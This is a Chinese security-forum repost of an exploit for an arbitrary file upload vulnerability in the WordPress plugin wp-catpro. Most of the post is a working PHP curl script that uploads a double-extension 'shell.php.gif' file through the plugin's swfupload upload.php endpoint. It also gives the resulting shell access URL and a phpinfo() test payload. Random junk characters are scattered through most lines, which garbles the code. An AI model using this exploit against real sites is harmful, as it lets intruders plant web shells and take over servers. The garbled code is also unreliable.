找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2570|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability- v4 w2 w9 R4 a* j9 c
#-----------------------------------------------------------------------8 ]! x+ L  A2 }3 W. \" c6 G
0 R7 H1 y" ]; c5 E
作者  => Zikou-16
7 f( T2 f: s6 B3 k5 t" h) x3 ^邮箱 => zikou16x@gmail.com0 d' w& p8 O' g! _! T. F- p% X
测试系统 : Windows 7 , Backtrack 5r3
8 W( p$ y& U. Q" W6 g8 s+ r下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip+ m$ w# Q% y0 `& E) Q# _- r# N+ @
####
' R+ f7 z8 ~- b+ y3 M9 D & J8 r. H, B$ Q& t& C3 K6 T7 w. e' H
#=> Exploit 信息:
6 B+ A2 r( S8 I% X9 q; C( k------------------
" J# h2 |1 r+ i5 z# 攻击者可以上传 file/shell.php.gif9 `' M+ h4 w- G" p# A! S7 i! ^
# ("jpg", "gif", "png")  // Allowed file extensions
$ s% |8 c; P' u& ~- o: I6 R8 n! [8 P# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
2 E$ f& s9 q. G6 M: b0 v# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
, Z$ ]( s! l6 w2 x. R6 x------------------  X6 F* \$ z  h: i% x4 v$ W
" F/ k8 x4 v, F
#=> Exploit" ~* F# m1 c( H# [9 Y, F( Y  r
-----------
! `# {. H% a; G2 z# Z. O+ b/ _<?php
& }' ^6 e# k% H4 z  V( n; |( l 4 ~+ \" e! }2 G5 ]
$uploadfile="zik.php.gif";0 `. M* @$ P- j
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" U# Y* T; k+ w/ u5 Jcurl_setopt($ch, CURLOPT_POST, true);
6 Q2 Q; Y0 S7 S; ccurl_setopt($ch, CURLOPT_POSTFIELDS,' [1 {2 E9 [4 _% ]2 E+ ]
array('Filedata'=>"@$uploadfile",5 g9 O7 s8 F3 l6 f3 B6 Z% Q( o
'folder'=>'/wp-content/uploads/catpro/'));8 N& \* a/ k) t9 {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);& d- h% I3 g! O' g' v7 s& T
$postResult = curl_exec($ch);
; r9 J2 ^5 N4 Ncurl_close($ch);! v4 I% Q2 F( Y; I

% V- v' w2 {4 A. N% dprint "$postResult";
+ b% t7 r& W& R4 ^
, V- k7 T! `+ U7 H; S# R7 gShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif- }9 O! M3 S! }' b
  ?>
1 ?9 {4 m$ v, G* s<?php1 J9 E5 P& c, E
phpinfo();
$ S, P+ |5 ?8 V4 H7 j$ T?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表